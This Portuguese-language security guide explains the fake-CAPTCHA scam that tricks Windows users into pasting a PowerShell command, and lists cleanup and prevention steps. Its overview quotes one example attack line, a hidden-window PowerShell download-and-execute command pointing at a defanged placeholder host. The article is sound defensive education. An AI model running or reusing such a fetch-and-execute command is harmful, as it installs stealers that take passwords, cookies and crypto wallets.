Resumo em uma frase: se você foi induzido a pressionar Win + R → Ctrl + V → Enter por um “CAPTCHA” suspeito, troque todas as senhas, faça varreduras completas com várias ferramentas e só relaxe quando tiver certeza de que não restou malware nem credenciais expostas.
Golpistas estão exibindo falsos reCAPTCHAs que instruem o usuário a colar e executar um comando PowerShell copiado automaticamente. O objetivo é instalar stealers como o Lumma Stealer para roubar cookies, senhas e carteiras de criptomoedas. Veja como reconhecer, eliminar e prevenir esse golpe.
Visão geral do golpe
Um banner aparentemente legítimo de verificação humana (o tradicional “I’m not a robot”) é exibido em sites de streaming duvidosos, geradores de cupons ou páginas que prometem downloads gratuitos. Em vez de pedir que o visitante marque a caixa, a armadilha exibe instruções que soam técnicas:
“Para provar que não é um bot, pressione Win + R, cole o comando já copiado e pressione Enter.”
Quem segue a orientação executa um script PowerShell encurtado—por exemplo, powershell -WindowStyle hidden (new-object System.Net.WebClient).DownloadString('hxxps://example[.]com/lm.ps1') | iex—que baixa e instala um stealer. O malware coleta dados sensíveis e, para reduzir rastros, costuma se autodeletar logo após enviar as informações ao operador.
Como o esquema se desenrola
- Manipulação visual – O reCAPTCHA falso imita a identidade visual do serviço do Google para ganhar credibilidade.
- Comando na área de transferência – Um script ofuscado é copiado em silêncio usando
document.execCommand('copy')ou APIs modernas. - Engenharia social – Instruções passo a passo visam reduzir o senso crítico (“só mais um atalho, nada demais”).
- Execução sem persistência – O stealer roda, exporta dados e remove vestígios para não ser detectado em reinicializações.
Consequências de um clique
As repercussões variam conforme o tipo de dado capturado:
- Roubo de sessão – Cookies ativos permitem que invasores acessem e-mail, lojas on‑line e redes sociais sem precisar da senha.
- Exfiltração de cofre de senhas – Se um gerenciador ficar desbloqueado, o malware lê o banco de dados e envia tudo.
- Criptocarteiras esvaziadas – O stealer dá prioridade a arquivos
.wallet, seeds e browsers com extensões Web3. - Vazamento de histórico comercial – Corretoras, bancos e gateways de pagamento ficam expostos, elevando o risco de fraude.
Resposta imediata recomendada
Execute todas as etapas da tabela abaixo em um dispositivo considerado limpo (ou em “Modo de Segurança com Rede”):
| Etapa | Objetivo | Ferramentas / Ações |
|---|---|---|
| Desconectar‑se e alterar senhas | Impedir uso indevido das credenciais já capturadas | Trocar senhas de e‑mail, bancos e redes sociais em dispositivo limpo; habilitar 2FA sempre que disponível |
| Verificar e remover malware | Detectar ou excluir o stealer (que pode se autodeletar) | Microsoft Defender – “Análise completa” e “Análise offline” Malwarebytes Free – Varredura abrangente ESET Online Scanner – “One‑Time Scan” |
| Conferir programas instalados | Remover cargas secundárias ou software indesejado | Painel de Controle ▸ Programas ▸ Desinstalar; eliminar itens desconhecidos |
| Analisar Eventos (opcional) | Mapear atividades suspeitas pós‑ataque | eventvwr.msc ▸ Logs de Aplicação e Sistema no horário do incidente |
| Medidas drásticas | Garantir sistema limpo se algo for detectado | a) Levar a um técnico confiável ou b) Backup → restauração de fábrica / reinstalação limpa do Windows |
Detalhamento das ferramentas de detecção
Microsoft Defender é nativo do Windows e oferece a “Análise offline”, que reinicia o PC em um ambiente miniOS isolado para remover malwares que se ocultam durante a sessão normal. Malwarebytes costuma detectar PUPs, adware e variantes não listadas pela Microsoft. Já o ESET Online Scanner faz comparação com assinaturas em nuvem sem necessidade de instalar suite completa.
Como interpretar os resultados das varreduras
- Sem detecções – Lumma Stealer e clones não mantêm persistência; se todas as varreduras retornarem limpas e as senhas tiverem sido trocadas, o risco residual é baixo.
- PUA em wallpaper – É comum o ESET quarentenar um JPEG alegando script oculto; deixar em quarentena ou excluir resolve.
- Alerta sobre
.ps1– Caso o script original ainda seja encontrado, deletá‑lo é suficiente; sem persistência, ele não será reexecutado. - Detecção de trojan persistente – Caso apareça algo como “Win32/Injector” ou “Backdoor”, siga imediatamente para backup e reinstalação limpa.
Recomendações complementares
- Verificar extensões do navegador – Remova qualquer extensão desconhecida ou instalada na data do golpe.
- Revisar sessões ativas – Em Google, Microsoft, redes sociais; encerrar logins não reconhecidos.
- Criar mídia de recuperação – Um pendrive de restauração ajuda a recuperar o sistema mesmo se o boot for comprometido no futuro.
- Educação de segurança – Captchas legítimos nunca solicitam comandos de sistema. Desconfie de instruções fora do padrão.
- Bloquear execução de scripts maliciosos:
- Windows 11: ativar Smart App Control em “Somente aplicações confiáveis”.
- PowerShell: se o fluxo de trabalho permitir, definir
Set‑ExecutionPolicy AllSignedpara exigir assinatura digital em cada script.
Perguntas frequentes
É necessário formatar o computador mesmo que nenhuma ameaça seja encontrada?
Geralmente não. Como o stealer se autodestrói, as varreduras múltiplas costumam bastar. Formatar é recomendável apenas se alguma detecção persistir ou se houver indícios de acesso indevido contínuo às suas contas.
Trocar senhas usando o mesmo PC infectado é seguro?
Não. Se possível, use outro dispositivo (smartphone ou notebook de confiança). Caso não tenha alternativa, opere em “Modo de Segurança com Rede” após uma varredura offline.
Qual política de execução é recomendada para usuários avançados?
RemoteSigned já impede scripts baixados da internet sem assinatura válida. Para ambientes corporativos ou uso sensível, AllSigned oferece camada extra, exigindo certificado em todos os scripts.
Posso remover o PowerShell para evitar esse tipo de golpe?
Não é prático: o Windows depende do PowerShell para tarefas internas. O controle de execução, aliado a bons hábitos de segurança, traz proteção sem comprometer funcionalidades.
Conclusão e próximos passos
O falso CAPTCHA que exige Win + R explora a curiosidade do usuário mais do que falhas de software. Com a troca imediata de senhas, varreduras completas e revisão de extensões e sessões, a grande maioria das vítimas neutraliza o perigo. Persistiu qualquer dúvida? Faça backup dos arquivos pessoais, reinstale o Windows do zero ou procure ajuda especializada. Por fim, compartilhe este guia com colegas: quanto mais pessoas reconhecerem o golpe, menos efetivo ele será.